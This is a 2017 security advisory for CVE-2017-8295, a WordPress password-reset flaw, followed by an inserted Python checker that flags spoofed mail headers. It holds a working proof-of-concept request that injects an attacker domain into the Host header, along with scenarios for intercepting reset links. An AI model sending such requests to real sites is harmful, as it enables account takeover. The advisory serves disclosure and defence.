WP 4.7.4 PR flaw

May 4th, 2017

====================================================
- Discovered by: Dawid Golunski (@dawid_golunski)
- dawid[at]legalhackers.com
- https://legalhackers.com
- ExploitBox.io (@Exploit_Box)

- CVE-2017-8295
- Release date: 03.05.2017
- Revision 1.0
- Severity: Medium/High
====================================================

I. VULNERABILITY
-------------------------

WordPress Core <= 4.7.4 Potential Unauthorized Password Reset (0day)


II. BACKGROUND
-------------------------

"WordPress is a free and open-source content management system
(CMS) based on PHP and MySQL.

WordPress was used by more than 27.5% of the top 10 million
websites as of February 2017. WordPress is reportedly the
most popular website management or blogging system in
use on the Web, supporting more than 60 million websites."

https://en.wikipedia.org/wiki/WordPress

III. INTRODUCTION
-------------------------

WordPress has a password reset feature that contains a vulnerability which
might, in some cases, allow an attacker to obtain the password reset link
without prior authentication.
Such an attack could lead to the attacker gaining unauthorised access to the
victim's WordPress account.

IV. DESCRIPTION
-------------------------

The vulnerability stems from WordPress using untrusted data by default
when creating the password reset e-mail, which is supposed to be delivered only
to the e-mail address associated with the account owner.

This can be observed in the following code snippet, which builds the From
e-mail address before calling the PHP mail() function:

------[ wp-includes/pluggable.php ]------

...

if ( !isset( $from_email ) ) {
    // Get the site domain and get rid of www.
    $sitename = strtolower( $_SERVER['SERVER_NAME'] );
    if ( substr( $sitename, 0, 4 ) == 'www.' ) {
        $sitename = substr( $sitename, 4 );
    }

    $from_email = 'wordpress@' . $sitename;
}

...

-----------------------------------------

As we can see, WordPress uses the SERVER_NAME variable to obtain the hostname of
the server in order to create the From/Return-Path header of the outgoing password
reset e-mail.
However, major web servers such as Apache by default set the SERVER_NAME variable
from the hostname supplied by the client (within the HTTP_HOST header):

https://httpd.apache.org/docs/2.4/mod/core.html#usecanonicalname


Because SERVER_NAME can be influenced by the client, an attacker could set it to an
arbitrary domain of their choice, e.g.:

attackers-mxserver.com

which would result in WordPress setting $from_email to

wordpress@attackers-mxserver.com

and thus in an outgoing e-mail with From/Return-Path set to this
malicious address.

Which e-mail header the attacker is able to modify, From or Return-Path,
depends on the server environment. As documented at
http://php.net/manual/en/function.mail.php
the From header also sets Return-Path under Windows.


Depending on the configuration of the mail server, this may result in
an e-mail being sent to the victim WordPress user with
such a malicious From/Return-Path address set in the e-mail headers.


This could, in some cases, allow the attacker to intercept the e-mail containing the
password reset link, both with and without user interaction.

Some example scenarios include:

* If the attacker knows the e-mail address of the victim user, they can perform a prior
DoS attack on the victim's e-mail account (e.g. by sending multiple
large files to exceed the user's disk quota, or by attacking the DNS server) in order to
cause the password reset e-mail to be rejected by the receiving server, or not to
reach its destination, and thus be returned to the account on the attacker's server.

* Some autoresponders might attach a copy of the e-mail sent in the body of the
auto-replied message.

* Sending multiple password reset e-mails to force the user to reply to the
message asking for an explanation of the endless password reset e-mails.
The reply containing the password link would then be sent to the attacker.

etc.


V. PROOF OF CONCEPT
-------------------------

If an attacker sends a request similar to the one below to a default WordPress
installation that is accessible by IP address (IP-based vhost):

-----[ HTTP Request ]----

POST /wp/wordpress/wp-login.php?action=lostpassword HTTP/1.1
Host: injected-attackers-mxserver.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 56

user_login=admin&redirect_to=&wp-submit=Get+New+Password

------------------------


WordPress will trigger the password reset function for the admin user account.

Because of the modified Host header, SERVER_NAME will be set to
the hostname of the attacker's choice.
As a result, WordPress will pass the following headers and e-mail body to the
/usr/bin/sendmail wrapper:


------[ resulting e-mail ]-----

Subject: [CompanyX WP] Password Reset
Return-Path: <wordpress@attackers-mxserver.com>
From: WordPress <wordpress@attackers-mxserver.com>
Message-ID: <e6fd614c5dd8a1c604df2a732eb7b016@attackers-mxserver.com>
X-Priority: 3
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

Someone requested that the password be reset for the following account:

http://companyX-wp/wp/wordpress/

Username: admin

If this was a mistake, just ignore this email and nothing will happen.

To reset your password, visit the following address:

<http://companyX-wp/wp/wordpress/wp-login.php?action=rp&key=AceiMFmkMR4fsmwxIZtZ&login=admin>

-------------------------------


As we can see, the Return-Path, From, and Message-ID fields all have the attacker's
domain set.


The headers can be verified by replacing /usr/sbin/sendmail with a
bash script such as:

#!/bin/bash
cat > /tmp/outgoing-email



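The check that the sendmail wrapper makes possible, written out as an added example that is not part of the original advisory: it mirrors the $from_email derivation from the quoted pluggable.php snippet and flags captured address headers whose domain is not the site's own. The canonical domain "companyX-wp" and the sample capture are constructed from the advisory's proof-of-concept output.

```python
import email
from email.utils import parseaddr

# Headers that the advisory shows carrying the Host-header-derived domain.
ADDRESS_HEADERS = ("Return-Path", "From", "Message-ID")


def derive_from_email(server_name):
    """Mirror the $from_email logic quoted from wp-includes/pluggable.php:
    lower-case SERVER_NAME, strip a leading 'www.', prefix 'wordpress@'."""
    sitename = server_name.lower()
    if sitename.startswith("www."):
        sitename = sitename[4:]
    return "wordpress@" + sitename


def header_domain(value):
    """Domain part of an address-bearing header (From, Return-Path, Message-ID)."""
    _, addr = parseaddr(value)
    if "@" not in addr:
        return None
    return addr.rpartition("@")[2].lower()


def check_outgoing_mail(raw_message, canonical_domain):
    """Return the names of address headers whose domain differs from
    canonical_domain. Meant to run over /tmp/outgoing-email as captured by
    the sendmail wrapper; an empty list means the headers are as expected."""
    msg = email.message_from_string(raw_message)
    expected = canonical_domain.lower()
    return [name for name in ADDRESS_HEADERS
            if msg.get(name) is not None and header_domain(msg.get(name)) != expected]


# Constructed sample capture, modelled on the advisory's "resulting e-mail".
SAMPLE_CAPTURE = """\
Subject: [CompanyX WP] Password Reset
Return-Path: <wordpress@attackers-mxserver.com>
From: WordPress <wordpress@attackers-mxserver.com>
Message-ID: <e6fd614c5dd8a1c604df2a732eb7b016@attackers-mxserver.com>
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8

Someone requested that the password be reset for the following account:
"""

if __name__ == "__main__":
    # A capture whose address headers point away from the site's own domain
    # indicates SERVER_NAME was taken from the client-supplied Host header.
    print(check_outgoing_mail(SAMPLE_CAPTURE, "companyX-wp"))
```
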
VI. BUSINESS IMPACT
-------------------------

Upon successful exploitation, an attacker may be able to reset a user's password
and gain unauthorized access to their WordPress account.


VII. SYSTEMS AFFECTED
-------------------------

All WordPress versions up to the latest 4.7.4


VIII. SOLUTION
-------------------------

No official solution is available. As a temporary solution, users can enable
UseCanonicalName so that Apache builds SERVER_NAME from the configured ServerName
rather than from the client-supplied Host header:

https://httpd.apache.org/docs/2.4/mod/core.html#usecanonicalname


This issue was first reported to the WordPress security team multiple times,
with the first report sent in July 2016.

As there has been no progress in this case, this advisory is finally
released to the public without an official patch.



IX. REFERENCES
-------------------------

https://legalhackers.com

https://ExploitBox.io

Vendor site:
https://wordpress.org

http://httpd.apache.org/docs/2.4/mod/core.html#usecanonicalname

http://php.net/manual/en/function.mail.php

https://tools.ietf.org/html/rfc5321



X. CREDITS
-------------------------

Discovered by

Dawid Golunski
dawid (at) legalhackers (dot) com

https://legalhackers.com
https://ExploitBox.io



Thanks to BeyondSecurity for help with contacting the vendor.


XI. REVISION HISTORY
-------------------------

03.05.2017 - Advisory released, rev. 1


XII. EXPLOITBOX - A PLAYGROUND FOR HACKERS
-------------------------

ExploitBox.io is coming soon.
Subscribe at https://ExploitBox.io to stay updated and be there for the launch.


XIII. LEGAL NOTICES
-------------------------

The information contained within this advisory is supplied "as-is" with
no warranties or guarantees of fitness of use or otherwise. I accept no
responsibility for any damage caused by the use or misuse of this information.